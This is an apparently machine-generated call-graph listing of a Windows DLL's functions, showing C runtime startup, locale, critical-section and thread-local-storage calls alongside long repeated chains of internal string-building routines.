16920->16931 16922 6da97659 16922->16914 16923 6da97662 16922->16923 16924 6da8937b __freea 14 API calls 16923->16924 16924->16913 16934 6da964de 16925->16934 16929 6da969a0 LCMapStringW 16930 6da96960 16929->16930 16930->16911 16930->16912 16930->16913 16932 6da98f98 WideCharToMultiByte 16931->16932 16932->16922 16935 6da965dd std::_Lockit::_Lockit 5 API calls 16934->16935 16936 6da964f4 16935->16936 16936->16930 16937 6da969ac 16936->16937 16940 6da964f8 16937->16940 16939 6da969b7 std::_Locinfo::_Locinfo_dtor 16939->16929 16941 6da965dd std::_Lockit::_Lockit 5 API calls 16940->16941 16942 6da9650e 16941->16942 16942->16939 16943->16803 16954 6da90928 16944->16954 16946 6da999f2 16947 6da90928 41 API calls 16946->16947 16948 6da99a11 16947->16948 16949 6da999a6 16948->16949 16950 6da94760 ___free_lconv_mon 14 API calls 16948->16950 16951 6da999c4 16949->16951 16950->16949 16968 6da8fb5a RtlLeaveCriticalSection 16951->16968 16953 6da999b2 16953->16297 16955 6da90939 16954->16955 16959 6da90935 _Yarn 16954->16959 16956 6da90940 16955->16956 16961 6da90953 IsInExceptionSpec 16955->16961 16957 6da90403 __dosmaperr 14 API calls 16956->16957 16958 6da90945 16957->16958 16960 6da8dabf ___std_exception_copy 41 API calls 16958->16960 16959->16946 16960->16959 16961->16959 16962 6da9098a 16961->16962 16963 6da90981 16961->16963 16962->16959 16966 6da90403 __dosmaperr 14 API calls 16962->16966 16964 6da90403 __dosmaperr 14 API calls 16963->16964 16965 6da90986 16964->16965 16967 6da8dabf ___std_exception_copy 41 API calls 16965->16967 16966->16965 16967->16959 16968->16953 16970 6da9211e 16969->16970 16972 6da9212c 16969->16972 16970->16972 16976 6da92144 16970->16976 16971 6da90403 __dosmaperr 14 API calls 16973 6da92134 16971->16973 16972->16971 16974 6da8dabf ___std_exception_copy 41 API calls 16973->16974 16975 6da9213e 16974->16975 16975->16246 16976->16975 16977 6da90403 __dosmaperr 14 API calls 16976->16977 16977->16973 16982 6da91b43 16978->16982 16983 6da91b14 16978->16983 16979 6da91b5a 16981 6da94760 ___free_lconv_mon 14 API calls 16979->16981 16980 6da94760 ___free_lconv_mon 14 API calls 16980->16982 16981->16983 16982->16979 16982->16980 16983->16247 17193 6da8982e 17194 6da89839 17193->17194 17195 6da8986c 17193->17195 17197 6da8985e 17194->17197 17198 6da8983e 17194->17198 17196 6da89988 __DllMainCRTStartup@12 89 API calls 17195->17196 17204 6da89848 17196->17204 17205 6da89881 17197->17205 17200 6da89843 17198->17200 17201 6da89854 17198->17201 17200->17204 17219 6da895e2 17200->17219 17224 6da895c3 17201->17224 17206 6da8988d ___scrt_is_nonwritable_in_current_image 17205->17206 17232 6da89653 17206->17232 17208 6da89894 __DllMainCRTStartup@12 17209 6da898bb 17208->17209 17210 6da89980 17208->17210 17218 6da898f7 ___scrt_is_nonwritable_in_current_image IsInExceptionSpec 17208->17218 17243 6da895b5 17209->17243 17211 6da89ec6 __DllMainCRTStartup@12 4 API calls 17210->17211 17213 6da89987 17211->17213 17214 6da898ca __RTC_Initialize 17214->17218 17246 6da8a084 RtlInitializeSListHead 17214->17246 17216 6da898d8 17216->17218 17247 6da8958a 17216->17247 17218->17204 17308 6da9206d 17219->17308 17397 6da8c37d 17224->17397 17227 6da895cc 17227->17204 17230 6da895df 17230->17204 17231 6da8c388 21 API calls 17231->17227 17233 6da8965c 17232->17233 17251 6da89ce5 IsProcessorFeaturePresent 17233->17251 17237 6da8966d 17238 6da89671 17237->17238 17261 6da92050 17237->17261 17238->17208 17241 6da89688 17241->17208 17242 6da8c393 ___scrt_uninitialize_crt 7 API calls 17242->17238 17302 6da8968c 17243->17302 17245 6da895bc 17245->17214 17246->17216 17248 6da8958f ___scrt_release_startup_lock 17247->17248 17249 6da89ce5 IsProcessorFeaturePresent 17248->17249 17250 6da89598 17248->17250 17249->17250 17250->17218 17252 6da89668 17251->17252 17253 6da8c35e 17252->17253 17264 6da8d4a7 17253->17264 17256 6da8c367 17256->17237 17258 6da8c36f 17259 6da8c37a 17258->17259 17260 6da8d4e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 17258->17260 17259->17237 17260->17256 17293 6da9a349 17261->17293 17265 6da8d4b0 17264->17265 17267 6da8d4d9 17265->17267 17269 6da8c363 17265->17269 17278 6da8d6e4 17265->17278 17268 6da8d4e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 17267->17268 17268->17269 17269->17256 17270 6da8c53a 17269->17270 17283 6da8d5f5 17270->17283 17273 6da8c54f 17273->17258 17276 6da8c56a 17276->17258 17277 6da8c56d ___vcrt_uninitialize_ptd 6 API calls 17277->17273 17279 6da8d5ac ___vcrt_FlsFree 5 API calls 17278->17279 17280 6da8d6fe 17279->17280 17281 6da8d71c InitializeCriticalSectionAndSpinCount 17280->17281 17282 6da8d707 17280->17282 17281->17282 17282->17265 17284 6da8d5ac ___vcrt_FlsFree 5 API calls 17283->17284 17285 6da8d60f 17284->17285 17286 6da8d628 TlsAlloc 17285->17286 17287 6da8c544 17285->17287 17287->17273 17288 6da8d6a6 17287->17288 17289 6da8d5ac ___vcrt_FlsFree 5 API calls 17288->17289 17290 6da8d6c0 17289->17290 17291 6da8d6db TlsSetValue 17290->17291 17292 6da8c55d 17290->17292 17291->17292 17292->17276 17292->17277 17294 6da9a359 17293->17294 17295 6da8967a 17293->17295 17294->17295 17297 6da9580c 17294->17297 17295->17241 17295->17242 17298 6da95813 17297->17298 17299 6da95856 GetStdHandle 17298->17299 17300 6da958b8 17298->17300 17301 6da95869 GetFileType 17298->17301 17299->17298 17300->17294 17301->17298 17303 6da89698 17302->17303 17304 6da8969c 17302->17304 17303->17245 17305 6da896a9 ___scrt_release_startup_lock 17304->17305 17306 6da89ec6 __DllMainCRTStartup@12 4 API calls 17304->17306 17305->17245 17307 6da89712 17306->17307 17314 6da92bb0 17308->17314 17311 6da8c388 17380 6da8c42d 17311->17380 17315 6da895e7 17314->17315 17316 6da92bba 17314->17316 17315->17311 17317 6da96791 __Getctype 6 API calls 17316->17317 17318 6da92bc1 17317->17318 17318->17315 17319 6da967d0 __Getctype 6 API calls 17318->17319 17320 6da92bd4 17319->17320 17322 6da92a77 17320->17322 17323 6da92a82 17322->17323 17324 6da92a92 17322->17324 17328 6da92a98 17323->17328 17324->17315 17327 6da94760 ___free_lconv_mon 14 API calls 17327->17324 17329 6da92aad 17328->17329 17330 6da92ab3 17328->17330 17332 6da94760 ___free_lconv_mon 14 API calls 17329->17332 17331 6da94760 ___free_lconv_mon 14 API calls 17330->17331 17333 6da92abf 17331->17333 17332->17330 17334 6da94760 ___free_lconv_mon 14 API calls 17333->17334 17335 6da92aca 17334->17335 17336 6da94760 ___free_lconv_mon 14 API calls 17335->17336 17337 6da92ad5 17336->17337 17338 6da94760 ___free_lconv_mon 14 API calls 17337->17338 17339 6da92ae0 17338->17339 17340 6da94760 ___free_lconv_mon 14 API calls 17339->17340 17341 6da92aeb 17340->17341 17342 6da94760 ___free_lconv_mon 14 API calls 17341->17342 17343 6da92af6 17342->17343 17344 6da94760 ___free_lconv_mon 14 API calls 17343->17344 17345 6da92b01 17344->17345 17346 6da94760 ___free_lconv_mon 14 API calls 17345->17346 17347 6da92b0c 17346->17347 17348 6da94760 ___free_lconv_mon 14 API calls 17347->17348 17349 6da92b1a 17348->17349 17354 6da928c4 17349->17354 17355 6da928d0 ___scrt_is_nonwritable_in_current_image 17354->17355 17370 6da8fb12 RtlEnterCriticalSection 17355->17370 17357 6da928da 17360 6da94760 ___free_lconv_mon 14 API calls 17357->17360 17361 6da92904 17357->17361 17360->17361 17371 6da92923 17361->17371 17362 6da9292f 17363 6da9293b ___scrt_is_nonwritable_in_current_image 17362->17363 17375 6da8fb12 RtlEnterCriticalSection 17363->17375 17365 6da92945 17366 6da92b65 __Getctype 14 API calls 17365->17366 17367 6da92958 17366->17367 17376 6da92978 17367->17376 17370->17357 17374 6da8fb5a RtlLeaveCriticalSection 17371->17374 17373 6da92911 17373->17362 17374->17373 17375->17365 17379 6da8fb5a RtlLeaveCriticalSection 17376->17379 17378 6da92966 17378->17327 17379->17378 17381 6da8c43a 17380->17381 17382 6da895ec 17380->17382 17383 6da8c448 17381->17383 17388 6da8d66b 17381->17388 17382->17204 17384 6da8d6a6 ___vcrt_FlsSetValue 6 API calls 17383->17384 17386 6da8c458 17384->17386 17393 6da8c411 17386->17393 17389 6da8d5ac ___vcrt_FlsFree 5 API calls 17388->17389 17390 6da8d685 17389->17390 17391 6da8d69d TlsGetValue 17390->17391 17392 6da8d691 17390->17392 17391->17392 17392->17383 17394 6da8c428 17393->17394 17395 6da8c41b 17393->17395 17394->17382 17395->17394 17396 6da8dcf4 ___vcrt_freefls@4 14 API calls 17395->17396 17396->17394 17403 6da8c471 17397->17403 17399 6da895c8 17399->17227 17400 6da92062 17399->17400 17401 6da92d2d __dosmaperr 14 API calls 17400->17401 17402 6da895d4 17401->17402 17402->17230 17402->17231 17404 6da8c47a 17403->17404 17405 6da8c47d GetLastError 17403->17405 17404->17399 17406 6da8d66b ___vcrt_FlsGetValue 6 API calls 17405->17406 17407 6da8c492 17406->17407 17408 6da8c4b1 17407->17408 17409 6da8c4f7 SetLastError 17407->17409 17410 6da8d6a6 ___vcrt_FlsSetValue 6 API calls 17407->17410 17408->17409 17409->17399 17411 6da8c4ab __Getctype 17410->17411 17411->17408 17412 6da8c4d3 17411->17412 17414 6da8d6a6 ___vcrt_FlsSetValue 6 API calls 17411->17414 17413 6da8d6a6 ___vcrt_FlsSetValue 6 API calls 17412->17413 17415 6da8c4e7 17412->17415 17413->17415 17414->17412 17416 6da8dcf4 ___vcrt_freefls@4 14 API calls 17415->17416 17416->17408 17417 6da86510 18148 6da81770 17417->18148 17419 6da8655d 17420 6da81770 43 API calls 17419->17420 17421 6da8658d 17420->17421 17422 6da81770 43 API calls 17421->17422 17423 6da865bd 17422->17423 17424 6da81770 43 API calls 17423->17424 17425 6da865ed 17424->17425 17426 6da81770 43 API calls 17425->17426 17427 6da8661d 17426->17427 17428 6da81770 43 API calls 17427->17428 17429 6da8664d 17428->17429 17430 6da81770 43 API calls 17429->17430 17431 6da8667d 17430->17431 17432 6da81770 43 API calls 17431->17432 17433 6da866ad 17432->17433 17434 6da81770 43 API calls 17433->17434 17435 6da866dd 17434->17435 17436 6da81770 43 API calls 17435->17436 17437 6da86707 17436->17437 17438 6da81770 43 API calls 17437->17438 17439 6da8672b 17438->17439 17440 6da81770 43 API calls 17439->17440 17441 6da8674f 17440->17441 17442 6da81770 43 API calls 17441->17442 17443 6da86773 17442->17443 18163 6da88590 17443->18163 17445 6da8678a 17446 6da81770 43 API calls 17445->17446 17447 6da867cf 17446->17447 17448 6da81770 43 API calls 17447->17448 17449 6da867ff 17448->17449 17450 6da81770 43 API calls 17449->17450 17451 6da8682f 17450->17451 17452 6da81770 43 API calls 17451->17452 17453 6da8685f 17452->17453 17454 6da81770 43 API calls 17453->17454 17455 6da8688f 17454->17455 17456 6da81770 43 API calls 17455->17456 17457 6da868bf 17456->17457 17458 6da81770 43 API calls 17457->17458 17459 6da868ef 17458->17459 17460 6da81770 43 API calls 17459->17460 17461 6da8691f 17460->17461 17462 6da81770 43 API calls 17461->17462 17463 6da8694f 17462->17463 17464 6da81770 43 API calls 17463->17464 17465 6da8697f 17464->17465 17466 6da81770 43 API calls 17465->17466 17467 6da869af 17466->17467 17468 6da81770 43 API calls 17467->17468 17469 6da869df 17468->17469 17470 6da81770 43 API calls 17469->17470 17471 6da86a09 17470->17471 17472 6da81770 43 API calls 17471->17472 17473 6da86a2d 17472->17473 17474 6da81770 43 API calls 17473->17474 17475 6da86a51 17474->17475 17476 6da81770 43 API calls 17475->17476 17477 6da86a75 17476->17477 17478 6da88590 43 API calls 17477->17478 17479 6da86a8c 17478->17479 18189 6da814d0 17479->18189 17481 6da86aa9 18206 6da820d0 17481->18206 17483 6da86ab4 17484 6da86ade std::ios_base::_Ios_base_dtor 17483->17484 17486 6da87d39 17483->17486 17485 6da81770 43 API calls 17484->17485 17487 6da86b21 17485->17487 18260 6da8dacf 17486->18260 18211 6da82160 17487->18211 17490 6da87d3e 17491 6da8dacf 41 API calls 17490->17491 17492 6da87d43 17491->17492 17496 6da81770 43 API calls 17492->17496 17493 6da81770 43 API calls 17494 6da86b87 17493->17494 17498 6da82160 43 API calls 17494->17498 17506 6da86b8f std::ios_base::_Ios_base_dtor 17494->17506 17495 6da86b2f std::ios_base::_Ios_base_dtor 17495->17490 17495->17493 17497 6da87d91 17496->17497 17499 6da81770 43 API calls 17497->17499 17498->17506 17502 6da87dc5 17499->17502 17500 6da81770 43 API calls 17501 6da86c24 17500->17501 17504 6da82160 43 API calls 17501->17504 17513 6da86c29 std::ios_base::_Ios_base_dtor 17501->17513 17503 6da81770 43 API calls 17502->17503 17505 6da87df9 17503->17505 17504->17513 17507 6da81770 43 API calls 17505->17507 17506->17490 17506->17500 17509 6da87e2d 17507->17509 17508 6da81770 43 API calls 17510 6da86cbe 17508->17510 17511 6da81770 43 API calls 17509->17511 17512 6da82160 43 API calls 17510->17512 17521 6da86cc3 std::ios_base::_Ios_base_dtor 17510->17521 17514 6da87e55 17511->17514 17512->17521 17513->17490 17513->17508 17516 6da81770 43 API calls 17514->17516 17515 6da81770 43 API calls 17517 6da86d58 17515->17517 17518 6da87e7d 17516->17518 17522 6da82160 43 API calls 17517->17522 17528 6da86d5d std::ios_base::_Ios_base_dtor 17517->17528 17519 6da81770 43 API calls 17518->17519 17520 6da87ea5 17519->17520 17523 6da81770 43 API calls 17520->17523 17521->17490 17521->17515 17522->17528 17525 6da87ed3 17523->17525 17524 6da81770 43 API calls 17526 6da86df2 17524->17526 17527 6da81770 43 API calls 17525->17527 17530 6da82160 43 API calls 17526->17530 17538 6da86df7 std::ios_base::_Ios_base_dtor 17526->17538 17529 6da87f07 17527->17529 17528->17490 17528->17524 17532 6da81770 43 API calls 17529->17532 17530->17538 17531 6da81770 43 API calls 17533 6da86e8c 17531->17533 17534 6da87f3b 17532->17534 17536 6da82160 43 API calls 17533->17536 17545 6da86e91 std::ios_base::_Ios_base_dtor 17533->17545 17535 6da81770 43 API calls 17534->17535 17537 6da87f6f 17535->17537 17536->17545 17540 6da81770 43 API calls 17537->17540 17538->17490 17538->17531 17539 6da81770 43 API calls 17541 6da86f26 17539->17541 17542 6da87fa3 17540->17542 17544 6da82160 43 API calls 17541->17544 17554 6da86f2b std::ios_base::_Ios_base_dtor 17541->17554 17543 6da81770 43 API calls 17542->17543 17546 6da87fd7 17543->17546 17544->17554 17545->17490 17545->17539 17548 6da81770 43 API calls 17546->17548 17547 6da81770 43 API calls 17549 6da86fc0 17547->17549 17550 6da8800b 17548->17550 17553 6da82160 43 API calls 17549->17553 17559 6da86fc5 std::ios_base::_Ios_base_dtor 17549->17559 17551 6da88590 43 API calls 17550->17551 17552 6da88022 17551->17552 17557 6da81770 43 API calls 17552->17557 17553->17559 17554->17490 17554->17547 17555 6da81770 43 API calls 17556 6da8705a 17555->17556 17560 6da82160 43 API calls 17556->17560 17566 6da8705f std::ios_base::_Ios_base_dtor 17556->17566 17558 6da8805d 17557->17558 17561 6da81770 43 API calls 17558->17561 17559->17490 17559->17555 17563 6da87099 17560->17563 17564 6da88085 17561->17564 17562 6da81770 43 API calls 17565 6da870f4 17562->17565 17563->17490 17563->17566 17567 6da81770 43 API calls 17564->17567 17568 6da870f9 17565->17568 17570 6da82160 43 API calls 17565->17570 17566->17562 17569 6da880ad 17567->17569 18228 6da816e0 17568->18228 17571 6da81770 43 API calls 17569->17571 17570->17568 17573 6da880db 17571->17573 17575 6da81770 43 API calls 17573->17575 17574 6da8714d 18233 6da81730 17574->18233 17578 6da8810f 17575->17578 17580 6da81770 43 API calls 17578->17580 17582 6da88143 17580->17582 17581 6da87166 17583 6da816e0 41 API calls 17581->17583 17584 6da81770 43 API calls 17582->17584 17586 6da8716e 17583->17586 17585 6da88177 17584->17585 17587 6da81770 43 API calls 17585->17587 17588 6da81730 43 API calls 17586->17588 17589 6da881ab 17587->17589 17590 6da8717b 17588->17590 17591 6da81770 43 API calls 17589->17591 17592 6da81ff0 43 API calls 17590->17592 17593 6da881df 17591->17593 17594 6da87187 17592->17594 17595 6da81770 43 API calls 17593->17595 17596 6da816e0 41 API calls 17594->17596 17597 6da88213 17595->17597 17598 6da8718f 17596->17598 17599 6da81770 43 API calls 17597->17599 17600 6da81730 43 API calls 17598->17600 17601 6da88247 17599->17601 17602 6da8719c 17600->17602 17603 6da81770 43 API calls 17601->17603 17604 6da81ff0 43 API calls 17602->17604 17605 6da8827b 17603->17605 17606 6da871a8 17604->17606 17607 6da81770 43 API calls 17605->17607 17608 6da816e0 41 API calls 17606->17608 17610 6da882af 17607->17610 17609 6da871b0 17608->17609 17611 6da81730 43 API calls 17609->17611 17612 6da81770 43 API calls 17610->17612 17613 6da871bd 17611->17613 17614 6da882e3 17612->17614 17615 6da81ff0 43 API calls 17613->17615 17616 6da81770 43 API calls 17614->17616 17618 6da871c9 17615->17618 17617 6da88317 17616->17617 17619 6da81770 43 API calls 17617->17619 17620 6da816e0 41 API calls 17618->17620 17621 6da8834b 17619->17621 17622 6da871d1 17620->17622 17623 6da81770 43 API calls 17621->17623 17624 6da81730 43 API calls 17622->17624 17625 6da8837f 17623->17625 17626 6da871de 17624->17626 17627 6da88590 43 API calls 17625->17627 17628 6da81ff0 43 API calls 17626->17628 17632 6da88396 17627->17632 17629 6da871ea 17628->17629 17630 6da816e0 41 API calls 17629->17630 17631 6da871f2 17630->17631 17633 6da81730 43 API calls 17631->17633 17637 6da883bb std::ios_base::_Ios_base_dtor 17632->17637 18265 6da82340 17632->18265 17635 6da871ff 17633->17635 17638 6da81ff0 43 API calls 17635->17638 17636 6da82340 41 API calls 17643 6da88431 std::ios_base::_Ios_base_dtor 17636->17643 17637->17636 17637->17643 17639 6da8720b 17638->17639 17640 6da816e0 41 API calls 17639->17640 17641 6da87213 17640->17641 17645 6da81730 43 API calls 17641->17645 17642 6da8dacf 41 API calls 17646 6da8858c 17642->17646 17643->17642 17644 6da88573 std::ios_base::_Ios_base_dtor 17643->17644 17647 6da87220 17645->17647 17648 6da81ff0 43 API calls 17647->17648 17649 6da8722c 17648->17649 17650 6da816e0 41 API calls 17649->17650 17651 6da87234 17650->17651 17652 6da81730 43 API calls 17651->17652 17653 6da87241 17652->17653 18242 6da81f90 17653->18242 17656 6da816e0 41 API calls 17657 6da87252 17656->17657 17658 6da81730 43 API calls 17657->17658 17659 6da8725f 17658->17659 17660 6da81ff0 43 API calls 17659->17660 17661 6da8726b 17660->17661 17662 6da816e0 41 API calls 17661->17662 17663 6da87273 17662->17663 17664 6da81730 43 API calls 17663->17664 17665 6da87280 17664->17665 17666 6da81ff0 43 API calls 17665->17666 17667 6da8728c 17666->17667 17668 6da816e0 41 API calls 17667->17668 17669 6da87294 17668->17669 17670 6da81730 43 API calls 17669->17670 17671 6da872a1 17670->17671 17672 6da81ff0 43 API calls 17671->17672 17673 6da872ad 17672->17673 17674 6da816e0 41 API calls 17673->17674 17675 6da872b5 17674->17675 17676 6da81730 43 API calls 17675->17676 17677 6da872c2 17676->17677 17678 6da81ff0 43 API calls 17677->17678 17679 6da872ce 17678->17679 17680 6da816e0 41 API calls 17679->17680 17681 6da872d6 17680->17681 17682 6da81730 43 API calls 17681->17682 17683 6da872e3 17682->17683 17684 6da81ff0 43 API calls 17683->17684 17685 6da872ef 17684->17685 17686 6da816e0 41 API calls 17685->17686 17687 6da872f7 17686->17687 17688 6da81730 43 API calls 17687->17688 17689 6da87304 17688->17689 17690 6da81ff0 43 API calls 17689->17690 17691 6da87310 17690->17691 17692 6da816e0 41 API calls 17691->17692 17693 6da87318 17692->17693 17694 6da81730 43 API calls 17693->17694 17695 6da87325 17694->17695 17696 6da81ff0 43 API calls 17695->17696 17697 6da87331 17696->17697 17698 6da816e0 41 API calls 17697->17698 17699 6da87339 17698->17699 17700 6da81730 43 API calls 17699->17700 17701 6da87346 17700->17701 17702 6da81ff0 43 API calls 17701->17702 17703 6da87352 17702->17703 17704 6da816e0 41 API calls 17703->17704 17705 6da8735a 17704->17705 17706 6da81730 43 API calls 17705->17706 17707 6da87367 17706->17707 17708 6da81ff0 43 API calls 17707->17708 17709 6da87373 17708->17709 17710 6da816e0 41 API calls 17709->17710 17711 6da8737b 17710->17711 17712 6da81730 43 API calls 17711->17712 17713 6da87388 17712->17713 17714 6da81ff0 43 API calls 17713->17714 17715 6da87394 17714->17715 17716 6da816e0 41 API calls 17715->17716 17717 6da8739c 17716->17717 17718 6da81730 43 API calls 17717->17718 17719 6da873a9 17718->17719 17720 6da81ff0 43 API calls 17719->17720 17721 6da873b5 17720->17721 17722 6da816e0 41 API calls 17721->17722 17723 6da873bd 17722->17723 17724 6da81730 43 API calls 17723->17724 17725 6da873ca 17724->17725 17726 6da81ff0 43 API calls 17725->17726 17727 6da873d6 17726->17727 17728 6da816e0 41 API calls 17727->17728 17729 6da873de 17728->17729 17730 6da81730 43 API calls 17729->17730 17731 6da873eb 17730->17731 17732 6da81ff0 43 API calls 17731->17732 17733 6da873f7 17732->17733 17734 6da816e0 41 API calls 17733->17734 17735 6da873ff 17734->17735 17736 6da81730 43 API calls 17735->17736 17737 6da8740c 17736->17737 17738 6da81ff0 43 API calls 17737->17738 17739 6da87418 17738->17739 17740 6da816e0 41 API calls 17739->17740 17741 6da87420 17740->17741 17742 6da81730 43 API calls 17741->17742 17743 6da8742d 17742->17743 17744 6da81ff0 43 API calls 17743->17744 17745 6da87439 17744->17745 17746 6da816e0 41 API calls 17745->17746 17747 6da87441 17746->17747 17748 6da81730 43 API calls 17747->17748 17749 6da8744e 17748->17749 17750 6da81ff0 43 API calls 17749->17750 17751 6da8745a 17750->17751 17752 6da816e0 41 API calls 17751->17752 17753 6da87462 17752->17753 17754 6da81730 43 API calls 17753->17754 17755 6da8746f 17754->17755 17756 6da81ff0 43 API calls 17755->17756 17757 6da8747b 17756->17757 17758 6da816e0 41 API calls 17757->17758 17759 6da87483 17758->17759 17760 6da81730 43 API calls 17759->17760 17761 6da87490 17760->17761 17762 6da81ff0 43 API calls 17761->17762 17763 6da8749c 17762->17763 17764 6da816e0 41 API calls 17763->17764 17765 6da874a4 17764->17765 17766 6da81730 43 API calls 17765->17766 17767 6da874b1 17766->17767 17768 6da81ff0 43 API calls 17767->17768 17769 6da874bd 17768->17769 17770 6da816e0 41 API calls 17769->17770 17771 6da874c5 17770->17771 18246 6da81fc0 17771->18246 17774 6da81730 43 API calls 17775 6da874df 17774->17775 17776 6da81ff0 43 API calls 17775->17776 17777 6da874eb 17776->17777 17778 6da816e0 41 API calls 17777->17778 17779 6da874f3 17778->17779 17780 6da81730 43 API calls 17779->17780 17781 6da87500 17780->17781 17782 6da81ff0 43 API calls 17781->17782 17783 6da8750c 17782->17783 17784 6da816e0 41 API calls 17783->17784 17785 6da87514 17784->17785 17786 6da81730 43 API calls 17785->17786 17787 6da87521 17786->17787 17788 6da81ff0 43 API calls 17787->17788 17789 6da8752d 17788->17789 17790 6da816e0 41 API calls 17789->17790 17791 6da87535 17790->17791 17792 6da81730 43 API calls 17791->17792 17793 6da87542 17792->17793 17794 6da81ff0 43 API calls 17793->17794 17795 6da8754e 17794->17795 17796 6da816e0 41 API calls 17795->17796 17797 6da87556 17796->17797 17798 6da81730 43 API calls 17797->17798 17799 6da87563 17798->17799 17800 6da81ff0 43 API calls 17799->17800 17801 6da8756f 17800->17801 17802 6da816e0 41 API calls 17801->17802 17803 6da87577 17802->17803 17804 6da81730 43 API calls 17803->17804 17805 6da87584 17804->17805 17806 6da81ff0 43 API calls 17805->17806 17807 6da87590 17806->17807 17808 6da816e0 41 API calls 17807->17808 17809 6da87598 17808->17809 17810 6da81730 43 API calls 17809->17810 17811 6da875a5 17810->17811 17812 6da81ff0 43 API calls 17811->17812 17813 6da875b1 17812->17813 17814 6da816e0 41 API calls 17813->17814 17815 6da875b9 17814->17815 17816 6da81730 43 API calls 17815->17816 17817 6da875c6 17816->17817 17818 6da81ff0 43 API calls 17817->17818 17819 6da875d2 17818->17819 17820 6da816e0 41 API calls 17819->17820 17821 6da875da 17820->17821 17822 6da81730 43 API calls 17821->17822 17823 6da875e7 17822->17823 17824 6da81ff0 43 API calls 17823->17824 17825 6da875f3 17824->17825 17826 6da816e0 41 API calls 17825->17826 17827 6da875fb 17826->17827 17828 6da81730 43 API calls 17827->17828 17829 6da87608 17828->17829 17830 6da81ff0 43 API calls 17829->17830 17831 6da87614 17830->17831 17832 6da816e0 41 API calls 17831->17832 17833 6da8761c 17832->17833 17834 6da81730 43 API calls 17833->17834 17835 6da87629 17834->17835 17836 6da81ff0 43 API calls 17835->17836 17837 6da87635 17836->17837 17838 6da816e0 41 API calls 17837->17838 17839 6da8763d 17838->17839 17840 6da81730 43 API calls 17839->17840 17841 6da8764a 17840->17841 17842 6da81ff0 43 API calls 17841->17842 17843 6da87656 17842->17843 17844 6da816e0 41 API calls 17843->17844 17845 6da8765e 17844->17845 17846 6da81730 43 API calls 17845->17846 17847 6da8766b 17846->17847 17848 6da81ff0 43 API calls 17847->17848 17849 6da87677 17848->17849 17850 6da816e0 41 API calls 17849->17850 17851 6da8767f 17850->17851 17852 6da81730 43 API calls 17851->17852 17853 6da8768c 17852->17853 17854 6da81ff0 43 API calls 17853->17854 17855 6da87698 17854->17855 17856 6da816e0 41 API calls 17855->17856 17857 6da876a0 17856->17857 17858 6da81730 43 API calls 17857->17858 17859 6da876ad 17858->17859 17860 6da81ff0 43 API calls 17859->17860 17861 6da876b9 17860->17861 17862 6da816e0 41 API calls 17861->17862 17863 6da876c1 17862->17863 17864 6da81730 43 API calls 17863->17864 17865 6da876d8 17864->17865 17866 6da81ff0 43 API calls 17865->17866 17867 6da876e4 17866->17867 17868 6da816e0 41 API calls 17867->17868 17869 6da876ec 17868->17869 17870 6da81730 43 API calls 17869->17870 17871 6da876f9 17870->17871 18151 6da817ae 18148->18151 18153 6da81786 _Yarn 18148->18153 18149 6da8188b 18282 6da814c0 18149->18282 18151->18149 18154 6da817e9 18151->18154 18155 6da8181a 18151->18155 18152 6da81890 18285 6da81420 18152->18285 18153->17419 18154->18152 18271 6da89399 18154->18271 18159 6da89399 std::_Facet_Register 43 API calls 18155->18159 18161 6da81806 _Yarn 18155->18161 18159->18161 18160 6da8dacf 41 API calls 18160->18149 18161->18160 18162 6da8186d std::ios_base::_Ios_base_dtor 18161->18162 18162->17419 18164 6da885e5 18163->18164 18183 6da8868f 18163->18183 18165 6da886ad 18164->18165 18166 6da885f0 18164->18166 18336 6da819e0 18165->18336 18167 6da8862a 18166->18167 18168 6da88600 18166->18168 18173 6da89399 std::_Facet_Register 43 API calls 18167->18173 18176 6da8861c 18167->18176 18170 6da886b2 18168->18170 18171 6da8860b 18168->18171 18172 6da81420 Concurrency::cancel_current_task 43 API calls 18170->18172 18174 6da89399 std::_Facet_Register 43 API calls 18171->18174 18175 6da886b7 18172->18175 18173->18176 18178 6da88611 18174->18178 18179 6da8dacf 41 API calls 18175->18179 18177 6da88685 18176->18177 18320 6da84000 18176->18320 18180 6da82340 41 API calls 18177->18180 18178->18175 18178->18176 18181 6da886bc 18179->18181 18180->18183 18184 6da82340 41 API calls 18181->18184 18186 6da88710 std::ios_base::_Ios_base_dtor 18181->18186 18183->17445 18185 6da886d7 18184->18185 18185->18186 18187 6da8dacf 41 API calls 18185->18187 18186->17445 18188 6da88738 18187->18188 18190 6da8db20 ___std_exception_copy 15 API calls 18189->18190 18191 6da8151b 6 API calls 18190->18191 18192 6da8158f 18191->18192 18193 6da815be 18191->18193 18192->18193 18347 6da818a0 18192->18347 18195 6da815fa 18193->18195 18196 6da81645 18193->18196 18197 6da81770 43 API calls 18195->18197 18199 6da81770 43 API calls 18196->18199 18200 6da81608 18197->18200 18198 6da81628 std::ios_base::_Ios_base_dtor 18198->17481 18199->18200 18200->18198 18201 6da8dacf 41 API calls 18200->18201 18203 6da81688 18201->18203 18202 6da816b6 std::ios_base::_Ios_base_dtor 18202->17481 18203->18202 18204 6da8dacf 41 API calls 18203->18204 18205 6da816dd 18204->18205 18207 6da82101 std::ios_base::_Ios_base_dtor 18206->18207 18208 6da820de 18206->18208 18207->17483 18208->18207 18209 6da8dacf 41 API calls 18208->18209 18210 6da8214c 18209->18210 18212 6da82328 18211->18212 18213 6da821ad 18211->18213 18214 6da819e0 43 API calls 18212->18214 18215 6da82323 18213->18215 18219 6da821fd 18213->18219 18220 6da82224 18213->18220 18217 6da822b7 18214->18217 18216 6da81420 Concurrency::cancel_current_task 43 API calls 18215->18216 18216->18212 18218 6da8dacf 41 API calls 18217->18218 18227 6da822f3 std::ios_base::_Ios_base_dtor 18217->18227 18221 6da82332 18218->18221 18219->18215 18222 6da82208 18219->18222 18224 6da89399 std::_Facet_Register 43 API calls 18220->18224 18225 6da8220e 18220->18225 18223 6da89399 std::_Facet_Register 43 API calls 18222->18223 18223->18225 18224->18225 18225->18217 18226 6da82340 41 API calls 18225->18226 18225->18227 18226->18217 18227->17495 18229 6da816eb 18228->18229 18231 6da81706 std::ios_base::_Ios_base_dtor 18228->18231 18230 6da8dacf 41 API calls 18229->18230 18229->18231 18232 6da8172a 18230->18232 18231->17574 18234 6da81753 18233->18234 18234->18234 18235 6da81770 43 API calls 18234->18235 18236 6da81765 18235->18236 18237 6da81ff0 18236->18237 18238 6da8203b 18237->18238 18239 6da81ffb 18237->18239 18240 6da82160 43 API calls 18238->18240 18239->17581 18241 6da82044 18240->18241 18241->17581 18243 6da81f9d 18242->18243 18244 6da81fb5 18242->18244 18245 6da81770 43 API calls 18243->18245 18244->17656 